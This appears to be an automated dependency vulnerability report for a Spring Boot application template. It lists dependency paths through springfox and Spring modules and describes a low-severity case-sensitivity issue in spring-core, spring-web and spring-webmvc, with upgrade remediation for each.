  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-core to version 6.1.14 or higher.

References

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-web to version 6.1.14 or higher.

References

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-webmvc to version 6.1.14 or higher.

References